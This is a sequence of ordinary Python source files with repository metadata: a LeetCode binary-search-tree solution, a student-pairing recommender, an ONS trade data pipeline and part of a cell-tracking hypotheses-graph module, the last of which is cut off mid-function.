'''\n\n    ### 1 ###\n    # fact = factorial(10)\n    # print 'factorial', fact\n\n    ### 2 ###\n    # x_mod_z = modulus(100, 12)\n    # print 'x_mod_z', x_mod_z\n\n    ### 3 ###\n    # lst2 = list_of_lists(5, 3)\n    # print 'list', lst2\n\n    ### 4 ###\n    # lst = lists_of_list(5, 3)\n    # print 'list', lst\n\n    ### 5 ###\n    # list1, list2 = tup_to_list([('f', 3), ('e', 9), ('j', 5), ('d', 1), ('g', 2)])\n    # print list1, list2\n\n    ### 6 ###\n    # dict_tup = tuple_to_dict([('f', 3), ('e', 9), ('j', 5), ('d', 1), ('g', 2),\n    #                           ('g', 3), ('g', 12), ('i', 2), ('e', 2)])\n    # print 'dict_tup', dict_tup\n\n    ### 7 ###\n    # sorted_tup = sort_tups([('f', 3), ('e', 9), ('j', 5), ('d', 1), ('g', 2),\n    #                         ('g', 3), ('g', 12), ('i', 2), ('e', 2)])\n    # print 'sorted_tup', sorted_tup\n\n    ### 8 ###\n    # tpl = remove_empty_tuples([('f', 3), ('e', 9), ('j', 5), (), ('d', 1), ('g', 2)])\n    # print 'tuple', tpl\n\n    ### 9 ###\n    # sumtest_arr = sum_arr(5, 10, xi=1.5)\n    # print 'sumtest_arr', sumtest_arr\n\n    ### 10 ###\n    # plot_x_pow_n(0.,100., 3)\n\n    ### 11 ###\n    # fourxfour_plot(-100, 100, numpts=100)\n\n    ### 12 ###\n    # scatterplot_random(-50., 50., numpts=100)\n\n    ### 13 ###\n    # twodim_xsq_ysq(-50., 50., numpix=100)\n\n    ### 14 ###\n    # data1 = read_data('FL_insurance_sample.csv', 18, delimiter = ',')\n    # data1 = read_data('gamma_true_gamma_obs.txt', 4, delimiter = ' ')\n    # for datrow in data1.T:\n    #     print datrow\n\n    ### 14 *alternative* ###\n    # data2 = read_csv('FL_insurance_sample.csv', 18, delimiter = ',')\n    # data2 = read_csv('gamma_true_gamma_obs.txt', 4, delimiter = ' ')\n    # print data1.shape, data2.shape\n    # for datrow in data2:\n    #     print datrow\n\n    ### 15 ###\n    # write_data(data1.T, 'test.csv', delimiter=',')\n\n    ### 16 ###\n    # join_csvs(['data1.csv', 'data2.csv'], [4,3], [0,0], header='id')\n\n    ### 17 ###\n    # hist_plot('FL_insurance_sample.csv', 'itemhist.png', 18, 16, delimiter=',', header=True)\n\n    ### 18 ###\n    # n_instances_whole, n_instances_all, loc_whole, loc_all = \\\n    #     count_instances_simple('FL_insurance_sample.csv', 'Coun', 18, delimiter=',', header=True)\n    # print n_instances_whole, n_instances_all\n    # print loc_whole, loc_all\n\n    ### 19 ###\n    # result = integrate_invexp(2., 1.)\n    # print result\n\n    ### 20 ###\n    # arguments = parse_arguments()\n    # print arguments.first_arg, arguments.second_arg\n\n# This tells python to run the main() function when the script is executed directly\nif __name__ == '__main__':\n    
main()\n","repo_name":"bjpop/cosmology_example","sub_path":"toy_problems.py","file_name":"toy_problems.py","file_ext":"py","file_size_in_byte":18329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"2040643598","text":"#\n# @lc app=leetcode id=235 lang=python3\n#\n# [235] Lowest Common Ancestor of a Binary Search Tree\n#\n\n# @lc code=start\n# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def lowestCommonAncestor(self, root, p, q):\n \"\"\"\n :type root: TreeNode\n :type p: TreeNode\n :type q: TreeNode\n :rtype: TreeNode\n \"\"\"\n\n p_val = min(p.val, q.val)\n q_val = max(p.val, q.val)\n\n self.minimum = root.val\n\n def search(node):\n\n if p_val <= node.val <= q_val:\n return node\n\n elif q_val < node.val:\n return search(node.left)\n \n else:\n return search(node.right)\n \n res = search(root)\n return res\n \n\n\n \n \n# @lc code=end\n\n","repo_name":"aryanjain28/DSA","sub_path":"revision_150/235.lowest-common-ancestor-of-a-binary-search-tree.py","file_name":"235.lowest-common-ancestor-of-a-binary-search-tree.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"37197722403","text":"# Import Pandas\nimport pandas as pd\n\n# Import TfIdfVectorizer from scikit-learn\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\n# Import linear_kernel\nfrom sklearn.metrics.pairwise import linear_kernel\n\nimport clean_info as ci \nimport model_selection as ms \nimport speed_up_ms as sums\n\n# Define a TF-IDF Vectorizer Object. Remove all english stop words such as 'the', 'a'\ntfidf = TfidfVectorizer(token_pattern=u'(?ui)\\\\b\\\\w*[a-z]+\\\\w*\\\\b', stop_words='english', use_idf = True)\n# tfidf = TfidfVectorizer(token_pattern=u'(?ui)\\\\b\\\\w*[a-z]+\\\\w*\\\\b', stop_words='english', use_idf = False)\n\nprimary = 'Name'\n# groupby = 'Race'\ngroupby = None\nuse_model = False \nspeed_model = False \n\n# data of people to be paired\n# csv = 'Prof Clarkson Test Data - Sheet1 (1).csv'\ncsv = '2110Data.csv'\n\n# round one variables\nnum = 2\nrand_num = 4\ndo_random = False \n\n# round two variables\npair_groups = True \nnum2 = 2\nrand_num2 = 3\ndo_random2 = True \n\n# features\n# features = ['Name', 'Major','Class 1','Class 2','Class 3','Class 4','Interest 1','Interest 2','Interest 3','Hometown','Hometype']\n# weights = {'Name': 0, 'Major': 30, 'Class 1': 20, 'Class 2': 20, 'Class 3': 20, 'Class 4': 20, 'Interest 1': 12, 'Interest 2': 12, 'Interest 3': 12, 'Hometown': 18, 'Hometype': 0}\ni_classes = ['Course1','Course2','Course3','Course4']\ninterests = ['Interest1','Interest2']\nfeatures = ['Name','Gender','Major','GradYear'] + i_classes + interests + ['StudyHabits','Hometown','CampusLocation','Race','Pref']\n# features = ['Name','Major','Grad Year'] + i_classes + interests + ['Hometown']\nreplace_space = i_classes + ['Major', 'Hometown','StudyHabits','CampusLocation']\n# replace_space = i_classes + ['Major', 'Hometown']\nreplace_list = interests\ncombine = {'Classes 1': i_classes, 'Interests': interests}\nc_weight = 16\ni_weight = 8\nweights = {'Name': 0, 'Gender': 0, 'Major': 5, 'GradYear': 7, \n 'Interest 1': i_weight, 'Interest 2': i_weight, \n 'StudyHabits': 11, 'Hometown': 3, 'CampusLocation': 10, 'Race': 0, 'Pref': 0}\nif pair_groups:\n for n in range(0, num):\n weights.update({ 'Course 
'+str((n*len(i_classes))+i): c_weight for i in range(1, len(i_classes)+1) })\nelse:\n weights.update({ 'Course '+str((len(i_classes))+i): c_weight for i in range(1, len(i_classes)+1) })\n\n# construct similarity matrix for group according to features and return pairings\ndef func_pairs(features, group, num, rand_num, do_random, i_classes, model_num):\n # apply clean_df function to features\n m1 = group.copy()\n m1 = ci.clean_df(m1, features, primary, replace_space)\n \n if use_model: # how to make this work for second round?\n cosine_sim = ms.construct_similarity(m1, model_num, combine)\n else:\n # BEGINNING ------------------------------------------------------------\n m1 = m1.assign(score = [''] * len(m1))\n for feature in features:\n if feature in weights:\n for i in range(weights[feature]):\n m1['score'] = m1['score'] + \" \" + m1[feature]\n else:\n m1['score'] = m1['score'] + \" \" + m1[feature]\n \n #Construct the required TF-IDF matrix by fitting and transforming the data\n tfidf_matrix = tfidf.fit_transform(m1['score'])\n\n # Compute the cosine similarity matrix\n cosine_sim = linear_kernel(tfidf_matrix, tfidf_matrix)\n # END -----------------------------------------------------------------\n \n #Construct a reverse map of indices and employee names\n indices = pd.Series(group.index, index=group['index']).drop_duplicates()\n\n return get_pairs(group['index'].sample(frac=1), indices, cosine_sim, group, num, rand_num, do_random)\n\n# minimize number of global variables\ndef convert_csv_to_matrix(csv, num):\n # Load data from csv\n metadata = pd.read_csv(csv)\n\n final = metadata[features + ['Email','Phone']]\n final = final.reset_index()\n\n m0 = metadata[features]\n for feature in replace_list:\n m0[feature] = m0[feature].apply(ci.key_replace)\n\n m0 = m0.reset_index()\n matches = []\n ones = []\n\n if groupby is not None:\n courses = m0[groupby].unique() # list of all unique department names\n \n for course in courses:\n group = (m0[m0[groupby] == course]).reset_index().drop('level_0', axis=1)\n \n # keep track of groups with only one member\n if len(group) == 1:\n ones.append(group)\n else:\n if speed_model:\n matches += sums.speed_up_pairings(features, group, num, rand_num, do_random, i_classes, 1, combine)\n else:\n matches += func_pairs(features, group, num, rand_num, do_random, i_classes, 1)\n \n if len(ones) != 0:\n if len(ones) == 1:\n for match in matches:\n if len(ones) == 0: break\n else:\n while len(match) < num:\n if len(ones) != 0:\n match.append(int(ones.pop(0)['index']))\n else: break\n if len(ones) > 0:\n matches[0].append(int(ones.pop(0)['index']))\n else:\n df = pd.DataFrame(columns=features + ['index'])\n \n for one in ones:\n df = df.append(one, sort=False)\n df = df.reset_index().drop('level_0', axis=1)\n if speed_model:\n matches += sums.speed_up_pairings(features, df, num, rand_num, do_random, i_classes, 1, combine)\n else:\n matches += func_pairs(features, df, num, rand_num, do_random, i_classes, 1)\n else:\n if speed_model:\n matches += sums.speed_up_pairings(features, m0, num, rand_num, do_random, i_classes, 1, combine)\n else:\n matches = func_pairs(features, m0, num, rand_num, do_random, i_classes, 1)\n # print(matches)\n if pair_groups:\n # prepare first round pairings for second round pairingsd\n pair_features = ['Name'] + i_classes\n df = pd.DataFrame(columns=pair_features)\n for pair in matches:\n lists = [[]] * len(i_classes)\n str_pair = [ str(x) for x in pair ]\n total_name = \", \".join(str_pair)\n\n data = [total_name]\n for i in pair:\n for 
feature in i_classes:\n add = m0[feature][m0['index'] == i].iloc[0]\n if add == add:\n lists[i_classes.index(feature)].append(m0[feature][m0['index'] == i].iloc[0])\n # print(lists)\n for i in lists:\n # print(i)\n data.append(\", \".join(i))\n pair_df = pd.DataFrame([data], columns=pair_features)\n df = pd.concat([df, pair_df], sort=False)\n df = df.reset_index().drop('index', axis=1).reset_index()\n two_classes = i_classes\n\n # complete second round pairings\n combine['Classes 2'] = two_classes\n if speed_model:\n result = sums.speed_up_pairings(pair_features, df, num2, rand_num2, do_random2, two_classes, 2, combine)\n else:\n result = func_pairs(pair_features, df, num2, rand_num2, do_random2, two_classes, 2)\n\n print_out = []\n for four in result:\n str_four = [ df[primary][df['index'] == x].iloc[0] for x in four ]\n print_out.append(\", \".join(str_four))\n else:\n print_out = [ \", \".join([ str(y) for y in x ]) for x in matches ] \n \n # get the data of the people represented by indices to insert into csv\n pairs = pd.DataFrame(columns=features + ['Email','Phone','index'])\n for group in print_out:\n index_list = group.split(\", \")\n for i in index_list:\n pairs = pairs.append(final[final['index'] == int(float(i))].iloc[0])\n data = [['-'] * (len(features)+3)]\n data2 = [['+'] * (len(features)+3)]\n\n # for spacing\n extra = pd.DataFrame(data, columns=features + ['Email','Phone','index'])\n extra2 = pd.DataFrame(data2, columns=features + ['Email','Phone','index'])\n pairs = pd.concat([pairs, extra, extra2], sort=False)\n\n # print this, output\n return pairs \n\n# Function that takes in movie title as input and outputs most similar movies\ndef get_recommendations(name, indices, cosine_sim, list_to_remove, m0, rand_num, do_random):\n # Get the index of the employee that matches the name\n idx = indices[name]\n\n # Get the pairwsie similarity scores of all employees with that employee\n sim_scores = list(enumerate(cosine_sim[idx]))\n \n # Sort the employees based on the similarity scores\n sim_scores = sorted(sim_scores, key=lambda x: x[1], reverse=True)\n\n # Get the employee indices\n emp_indices = []\n emp_sims = []\n if do_random:\n group_num = rand_num \n else:\n group_num = num + 1\n for i in sim_scores:\n if (len(emp_indices) == group_num): break\n if i[0] not in list_to_remove and i[0] != idx:\n emp_indices.append(i[0])\n emp_sims.append(i[1])\n\n # Return the top group_num most similar people not already paired\n result = m0.iloc[emp_indices]\n result = result.assign(Similarity = emp_sims) # still need this?\n return result \n\nimport random \n# choose partners from list of top similar people from get_recommendations\ndef get_random(mylist, num, do_random): # num = number of people per group\n if (len(mylist) > num):\n inds = list(mylist.index)\n result = pd.DataFrame(columns=features)\n if do_random:\n rand_inds = random.sample(inds, num-1)\n for i in rand_inds:\n result = pd.concat([result, mylist[mylist.index == i]], sort=False)\n else:\n for i in range(0, num-1):\n result = pd.concat([result, mylist[mylist.index == inds[i]]], sort=False)\n else:\n result = mylist\n return result\n\n# loop through list of people and pair people not already paired\ndef get_pairs(emplist, indices, cosine_sim, m0, num, rand_num, do_random):\n pairs = []\n list_to_remove = []\n \n for e in emplist:\n if indices[e] not in list_to_remove:\n partner = list(get_random(get_recommendations(e, indices, cosine_sim, list_to_remove, m0, rand_num, do_random), num, do_random)['index'])\n name0 = e\n 
pair = [name0]\n \n list_to_remove.append(indices[e])\n for p in partner:\n pair.append(p)\n list_to_remove.append(indices[p])\n\n pairs.append(pair)\n \n list_to_remove.sort(reverse=True)\n return pairs\n\ndf = convert_csv_to_matrix(csv, num)\nprint(df)\n# print(\"Done\")\ndf.to_csv('testing.csv', index=False)","repo_name":"ALai2/AWS-Flask-ML-App","sub_path":"recommender/match_2_into_4.py","file_name":"match_2_into_4.py","file_ext":"py","file_size_in_byte":10865,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"38550474976","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[2]:\n\n\nimport pandas as pd\nimport json\nfrom gssutils import *\n\nfrom zipfile import ZipFile\nfrom io import BytesIO\n\n\n# In[3]:\n\n\ndef left(s, amount):\n return s[:amount]\n\ndef right(s, amount):\n return s[-amount:]\n\n\n# In[4]:\n\n\npd.options.mode.chained_assignment = None\n\ninfo = json.load(open('info.json'))\n\nlandingPage = info['landingPage']\nlandingPage\n\nscraper1 = Scraper(landingPage[0])\nscraper1.dataset.family = info['families']\nscraper1\n\nscraper2 = Scraper(landingPage[1])\nscraper2\n\ndistribution1 = scraper1.distribution(mediaType=lambda x: 'zip' in x, latest=True)\ndistribution1\n\ndistribution2 = scraper2.distribution(mediaType=lambda x: 'zip' in x, latest=True)\ndistribution2\n\ndescr = \"\"\"\nMonthly import country-by-commodity data on the UK's trade in goods, including trade by all countries and selected commodities, non-seasonally adjusted.\n\nUsers should note the following:\nIndustry data has been produced using Standard Industrial Classification 2007 (SIC07).\nCommodity data has been produced using Standard International Trade Classification (SITC).\n\nDue to risks around disclosing data related to individual firms we are only able to provide data for certain combinations of the dimensions included, i.e. country, commodity and industry. 
This dataset therefore provides the following two combinations:\n Industry (SIC07 2 digit), by Commodity (SITC 2 digit), by geographic region (worldwide, EU and non-EU)\n Industry (SIC07 2 digit), by Commodity total, by individual country\n\nMethodology improvements\nWithin this latest experimental release improvements have been made to the methodology that has resulted in some revisions when compared to our previous release in April 2019.\nThese changes include; improvements to the data linking methodology and a targeted allocation of some of the Balance of Payments (BoP) adjustments to industry.\nThe data linking improvements were required due to subtleties in both the HMRC data and IDBR not previously recognised within Trade.\n\nWhile we are happy with the quality of the data in this experimental release we have noticed some data movements, specifically in 2018.\nWe will continue to review the movements seen in both the HMRC microdata and the linking methodology and, where appropriate, will further develop the methodology for Trade in Goods by Industry for future releases.\n\n\"\"\"\n\ntitle = \"Trade in goods: country-by-commodity, exports and imports\"\nscraper1.dataset.title = 'UK trade in goods: country-by-commodity, exports and imports'\nscraper2.dataset.title = 'UK trade in goods: country-by-commodity, exports and imports'\nscraper1.dataset.description = descr\nscraper2.dataset.description = descr\n\n\ndef yearSum(dataframe):\n '''\n sums up the observations for each respective year from Jan to Dec\n and returns the dataframe with summed year-observation columns\n '''\n df = dataframe\n new_data = []\n new_data.append(df.iloc[:,0:3])\n\n startYear = int(list(df.columns)[3][:4])\n endYear = int(list(df.columns)[-1][:4])\n\n for year in range(startYear,endYear+1):\n year = str(year)\n df1 = df.loc[:, year +'JAN' : year +'DEC']\n df1[year] = df1.sum(axis=1)\n new_data.append(df1[year])\n year_sum = pd.concat(new_data, axis=1)\n return year_sum\n\n\ndef transform(dataframe):\n '''transforms the dataframe to a datacube\n '''\n df = dataframe\n df.rename(columns={\n 'COMMODITY': 'Commodity',\n 'COUNTRY': 'ONS Partner Geography',\n 'DIRECTION': 'Flow'\n }, inplace=True)\n tidy = pd.melt(df, id_vars=['Commodity','ONS Partner Geography', 'Flow'], var_name='Period', value_name='Value')\n tidy_sheet = tidy.sort_values(['Commodity','ONS Partner Geography', 'Flow'])\n #tidy_sheet = tidy_sheet[tidy_sheet['Value'] != 0]\n return tidy_sheet\n\n\n# In[5]:\n\n\ntab_names = ['1. Annual Exports', '2. Quarterly Exports', '3. Monthly Exports']\ntidy_tabs = []\n\n'''Country by Commodity Export data'''\nwith ZipFile(BytesIO(scraper1.session.get(distribution1.downloadURL).content)) as zip:\n assert(len(zip.namelist()) == 1)\n with zip.open(zip.namelist()[0]) as excelFile:\n buffered_fobj = BytesIO(excelFile.read())\n for i in tab_names:\n data1 = pd.read_excel(buffered_fobj,\n sheet_name=i, skiprows=3, dtype={\n 'COMMODITY': 'category',\n 'COUNTRY': 'category',\n 'DIRECTION': 'category'\n }, na_values=['','N/A'], keep_default_na=False)\n tidy_tabs.append(data1)\n\nexport_sheets = []\n\nfor i in tidy_tabs:\n export_sheets.append(transform(i))\n\ntable1 = pd.concat(export_sheets)\ntable1\n\n\n# In[6]:\n\n\ntab_names = ['1. Annual Imports', '2. Quarterly Imports', '3. 
Monthly Imports']\ntidy_tabs = []\n\n'''Country by Commodity Import data'''\nwith ZipFile(BytesIO(scraper2.session.get(distribution2.downloadURL).content)) as zip:\n assert(len(zip.namelist()) == 1)\n with zip.open(zip.namelist()[0]) as excelFile:\n buffered_fobj = BytesIO(excelFile.read())\n for i in tab_names:\n data2 = pd.read_excel(buffered_fobj,\n sheet_name=i, skiprows=3, dtype={\n 'COMMODITY': 'category',\n 'COUNTRY': 'category',\n 'DIRECTION': 'category'\n }, na_values=['','N/A'], keep_default_na=False)\n tidy_tabs.append(data2)\n\nimport_sheets = []\n\nfor i in tidy_tabs:\n import_sheets.append(transform(i))\n\ntable2 = pd.concat(import_sheets)\ntable2\n\n\n# In[7]:\n\n\n# =================================================================================================\n# =================================================================================================\n# =================================================================================================\n# Get rid of some years as PMD4 is having trouble publishing without timing out\ntable = pd.concat([table1, table2])\n#print(table['Commodity'].count())\n\n\"\"\"for y in range(1995, 2018):\n table = table[~table['Period'].str.contains(str(y))]\n #print(str(y) + ': ' + str(table['Commodity'].count()))\"\"\"\n\ntable['Period'].unique()\n# =================================================================================================\n# =================================================================================================\n# =================================================================================================\n\n\n# In[8]:\n\n\npd.set_option('display.float_format', lambda x: '%.0f' % x)\n\ntable.loc[table['Period'].str.len() == 7, 'Period'] = pd.to_datetime(table.loc[table['Period'].str.len() == 7, 'Period'], format='%Y%b').astype(str).map(lambda x: 'month/' + left(x,7))\n#table['Period'] = table['Period'].astype(str)\ntable.dropna(subset=['Value'], inplace=True)\n#table['Value'] = table['Value'].astype(int)\n\ntable['Commodity'].cat.categories = table['Commodity'].cat.categories.map(lambda x: x.split(' ')[0])\ntable['ONS Partner Geography'].cat.categories = table['ONS Partner Geography'].cat.categories.map(lambda x: x[:2])\ntable['Flow'] = table['Flow'].map(lambda x: x.split(' ')[1])\n\n\n# In[9]:\n\n\ntable['Seasonal Adjustment'] = pd.Series('NSA', index=table.index, dtype='category')\n#table['Measure Type'] = pd.Series('gbp-million', index=table.index, dtype='category')\n#table['Unit'] = pd.Series('gbp-million', index=table.index, dtype='category')\n\ntable = table[['ONS Partner Geography','Period','Flow','Commodity','Seasonal Adjustment','Value']]\ntable['Flow'] = table['Flow'].map(lambda x: pathify(x))\n\ntable\n\n\n# In[10]:\n\n\nimport numpy as np\n\nclass MyDict(dict):\n def __missing__(self, key):\n return key\n\ndf = table.reset_index(drop=True)\n\ndf['Marker'] = ''\ndf['Marker'] = np.where(df['Value'].str.isnumeric() == False, df['Value'], df['Marker'])\n\nmarkerRep = MyDict({'X' : 'data-not-collated'})\nvalRep = MyDict({'X' : ''})\n\ndf['Marker'] = df['Marker'].map(markerRep)\ndf['Value'] = df['Value'].map(valRep)\n\ndf\n\n\n# In[11]:\n\n\ndfMonth = df[df['Period'].str.contains(\"month\")]\ndfQuarter = df[df['Period'].str.contains(\"Q\")]\ndfQuarter['Period'] = dfQuarter['Period'].map(lambda x: 'quarter/' + left(x, 4) + '-' + right(x, 2))\ndfYear = df[~df['Period'].str.contains(\"month|Q\")]\ndfYear['Period'] = dfYear['Period'].map(lambda x: 'year/' + x)\n\ndf = pd.concat([dfYear, 
dfQuarter, dfMonth]).reset_index(drop=True)\n\ndf['Commodity'] = df['Commodity'].astype(str)\n\ndf\n\n\n# In[12]:\n\n\ndf.dtypes\n\n\n# In[13]:\n\n\ninfo_json_dataset_id = info.get('id', Path.cwd().name)\ninfo_json_dataset_id\n\n\n# In[14]:\n\n\n\"\"\"years = table['Period'].map(lambda p: p[-7:-3])\nfor period in years.unique():\n\n if len(cubes.cubes) == 0:\n graph_uri = f\"http://gss-data.org.uk/graph/gss_data/trade/ons-trade-in-goods\"\n csv_name = 'ons-trade-in-goods'\n cubes.add_cube(scraper1, table[years == period], csv_name, graph=info_json_dataset_id)\n else:\n graph_uri = f\"http://gss-data.org.uk/graph/gss_data/trade/ons-trade-in-goods/{period}\"\n csv_name = f\"ons-trade-in-goods-{period}\"\n cubes.add_cube(scraper1, table[years == period], csv_name, graph=info_json_dataset_id, override_containing_graph=graph_uri, suppress_catalog_and_dsd_output=True)\n\ngraph_uri\"\"\"\n\n\n# In[19]:\n\n\ndf = df[ df['Commodity'].isin(['4','04'])]\n\ndf = df.head(10000).reset_index(drop=True)\n\ndf\n\n\n# In[16]:\n\n\ndf.to_csv('observations.csv', index=False)\n\ncatalog_metadata = scraper1.as_csvqb_catalog_metadata()\ncatalog_metadata.to_json_file('catalog-metadata.json')\n\n\n# In[17]:\n\n\nfrom IPython.core.display import HTML\nfor col in df:\n if col not in ['Value']:\n df[col] = df[col].astype('category')\n display(HTML(f\"<h2>{col}</h2>\"))\n display(df[col].cat.categories)\n\n","repo_name":"GSS-Cogs/family-trade","sub_path":"datasets/ONS-Trade-in-goods/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9903,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"11252529766","text":"from __future__ import print_function, absolute_import, nested_scopes, generators, division, with_statement, unicode_literals\nimport logging\nimport numpy as np\nfrom hytra.core.hypothesesgraph import HypothesesGraph, getTraxelFeatureVector, negLog, listify\nimport hytra.core.jsongraph\nfrom hytra.util.progressbar import ProgressBar, DefaultProgressVisitor\n\ndef getLogger():\n ''' logger to be used in this module '''\n return logging.getLogger(__name__)\n\nclass IlastikHypothesesGraph(HypothesesGraph):\n '''\n Hypotheses graph specialized for the ConservationTracking implementation in ilastik.\n '''\n\n def __init__(self, \n probabilityGenerator,\n timeRange, \n maxNumObjects, \n numNearestNeighbors,\n fieldOfView,\n divisionThreshold=0.1,\n withDivisions=True,\n borderAwareWidth=10,\n maxNeighborDistance=200,\n transitionParameter=5.0,\n transitionClassifier=None,\n skipLinks=1,\n skipLinksBias=20,\n progressVisitor=DefaultProgressVisitor()):\n '''\n Constructor\n '''\n super(IlastikHypothesesGraph, self).__init__()\n\n # store values\n self.probabilityGenerator = probabilityGenerator\n self.timeRange = timeRange\n self.maxNumObjects = maxNumObjects\n self.numNearestNeighbors = numNearestNeighbors\n self.fieldOfView = fieldOfView\n self.divisionThreshold = divisionThreshold\n self.withDivisions = withDivisions\n self.borderAwareWidth = borderAwareWidth\n self.maxNeighborDistance = maxNeighborDistance\n self.transitionClassifier = transitionClassifier\n self.transitionParameter = transitionParameter\n self.skipLinks = skipLinks\n self.skipLinksBias = skipLinksBias\n self.progressVisitor = progressVisitor\n\n # build hypotheses graph\n self.buildFromProbabilityGenerator(probabilityGenerator,\n numNearestNeighbors=numNearestNeighbors,\n maxNeighborDist=maxNeighborDistance,\n withDivisions=withDivisions,\n 
divisionThreshold=divisionThreshold,\n skipLinks=skipLinks)\n\n def __getstate__(self):\n \"\"\"Return state values to be pickled.\"\"\"\n return (self._graph,\n self.withTracklets,\n self.allowLengthOneTracks,\n self._nextNodeUuid,\n self.maxNumObjects,\n self.skipLinksBias,\n self.transitionClassifier,\n self.transitionParameter,\n self.withDivisions,\n self.fieldOfView,\n self.probabilityGenerator,\n self.timeRange,\n self.numNearestNeighbors,\n self.divisionThreshold,\n self.borderAwareWidth,\n self.maxNeighborDistance,\n self.skipLinks\n )\n\n def __setstate__(self, state):\n \"\"\"Restore state from the unpickled state values.\"\"\"\n\n try:\n self._graph, \\\n self.withTracklets, \\\n self.allowLengthOneTracks, \\\n self._nextNodeUuid, \\\n self.maxNumObjects, \\\n self.skipLinksBias, \\\n self.transitionClassifier, \\\n self.transitionParameter, \\\n self.withDivisions, \\\n self.fieldOfView, \\\n self.probabilityGenerator, \\\n self.timeRange, \\\n self.numNearestNeighbors, \\\n self.divisionThreshold, \\\n self.borderAwareWidth, \\\n self.maxNeighborDistance, \\\n self.skipLinks \\\n = state\n except:\n # Tolerate pickles from older versions that carry fewer fields.\n pass\n\n self.progressVisitor = DefaultProgressVisitor()\n\n def insertEnergies(self):\n \"\"\"\n Inserts the energies (AKA features) into the graph, such that each node and link \n holds all information needed to run tracking.\n\n See the documentation of `hytra.core.hypothesesgraph` for details on how the features are stored.\n \"\"\"\n # define wrapper functions\n def detectionProbabilityFunc(traxel):\n return self.getDetectionFeatures(traxel, self.maxNumObjects + 1)\n\n def transitionProbabilityFunc(srcTraxel, destTraxel):\n if self.transitionClassifier is None:\n return self.getTransitionFeaturesDist(srcTraxel, destTraxel, self.transitionParameter, self.maxNumObjects + 1)\n else:\n return self.getTransitionFeaturesRF(srcTraxel, destTraxel, self.transitionClassifier, self.probabilityGenerator, self.maxNumObjects + 1)\n\n def boundaryCostMultiplierFunc(traxel, forAppearance):\n return self.getBoundaryCostMultiplier(traxel, self.fieldOfView, self.borderAwareWidth, self.timeRange[0], self.timeRange[-1], forAppearance)\n\n def divisionProbabilityFunc(traxel):\n if self.withDivisions:\n try:\n divisionFeatures = self.getDivisionFeatures(traxel)\n if divisionFeatures[0] > self.divisionThreshold:\n divisionFeatures = list(reversed(divisionFeatures))\n else:\n divisionFeatures = None\n except:\n divisionFeatures = None\n return divisionFeatures\n else:\n return None\n\n super(IlastikHypothesesGraph, self).insertEnergies(\n self.maxNumObjects,\n detectionProbabilityFunc,\n transitionProbabilityFunc,\n boundaryCostMultiplierFunc,\n divisionProbabilityFunc,\n self.skipLinksBias)\n\n def getDetectionFeatures(self, traxel, max_state):\n \"\"\"\n Use the detection probabilities stored as `detProb` in the features of the traxel.\n \"\"\"\n return getTraxelFeatureVector(traxel, \"detProb\", max_state)\n\n\n def getDivisionFeatures(self, traxel):\n \"\"\"\n Use the division probability stored in the features of the given traxel.\n \"\"\"\n prob = traxel.get_feature_value(\"divProb\", 0)\n return [1.0 - prob, prob]\n\n\n def getTransitionFeaturesDist(self, traxelA, traxelB, transitionParam, max_state):\n \"\"\"\n Get the transition probabilities based on the distance between the two objects.\n \"\"\"\n positions = [np.array([t.X(), t.Y(), t.Z()]) for t in [traxelA, traxelB]]\n dist = np.linalg.norm(positions[0] - positions[1])\n prob = np.exp(-dist / transitionParam)\n\n return [1.0 - prob] + [prob] * (max_state - 
1)\n\n\n def getTransitionFeaturesRF(self, traxelA, traxelB, transitionClassifier, probabilityGenerator, max_state):\n \"\"\"\n Get the transition probabilities by predicting them with the classifier\n \"\"\"\n feats = [probabilityGenerator.getTraxelFeatureDict(obj.Timestep, obj.Id) for obj in [traxelA, traxelB]]\n featVec = probabilityGenerator.getTransitionFeatureVector(feats[0], feats[1], transitionClassifier.selectedFeatures)\n probs = transitionClassifier.predictProbabilities(featVec)[0]\n\n # Objects at or near image borders confuse the classifier, so predict their probability just by distance\n upperBound = self.fieldOfView.getUpperBound()\n lowerBound = self.fieldOfView.getLowerBound()\n\n coordsMax = feats[0]['Coord<Maximum >']\n boundMax = np.array(upperBound[1:len(coordsMax)+1])\n coordsMin = feats[0]['Coord<Minimum >']\n boundMin = np.array(lowerBound[1:len(coordsMin)+1])\n\n dist_border = self.fieldOfView.spatial_distance_to_border(traxelA.Timestep, traxelA.X(), traxelA.Y(), traxelA.Z(), False)\n\n # find the objects crossing the image border and return the distance based probability instead\n # REASON: The TC classifier gets confused by the feature values at the image border.\n # experiments on Fluo-N2DH-SIM 01:\n # TC no border treatment: TRA measure 0.9888\n # TC with border treatment: 0.991302\n # pure distance: 0.993\n # from all links: used distance 340 times, TC prob 3088 times used\n\n\n # experiments on Rapoport:\n # TC no border treatment: TRA measure 0.952467\n # TC with border treatment: 0.95267\n # pure distance: 0.951674\n # from all links: used distance 13598 times, TC prob 271502 times\n\n if np.isclose(coordsMax, boundMax).any() or np.isclose(coordsMin, boundMin).any():\n return self.getTransitionFeaturesDist(traxelA, traxelB, self.transitionParameter, self.maxNumObjects + 1)\n else:\n return [probs[0]] + [probs[1]] * (max_state - 1)\n\n\n\n def getBoundaryCostMultiplier(self, traxel, fov, margin, t0, t1, forAppearance):\n \"\"\"\n A traxel's appearance and disappearance probabilities decrease linearly within a `margin` of the image border,\n which is defined by the field of view `fov`. \n Traxels in the first frame appear for free, and traxels in the last frame disappear for free.\n \"\"\"\n if (traxel.Timestep <= t0 and forAppearance) or (traxel.Timestep >= t1 - 1 and not forAppearance):\n return 0.0\n\n dist = fov.spatial_distance_to_border(traxel.Timestep, traxel.X(), traxel.Y(), traxel.Z(), False)\n if dist > margin:\n return 1.0\n else:\n if margin > 0:\n return float(dist) / margin\n else:\n return 1.0\n\n\ndef convertLegacyHypothesesGraphToJsonGraph(hypothesesGraph,\n nodeIterator,\n arcIterator,\n withTracklets,\n maxNumObjects,\n numElements,\n traxelMap,\n detectionProbabilityFunc,\n transitionProbabilityFunc,\n 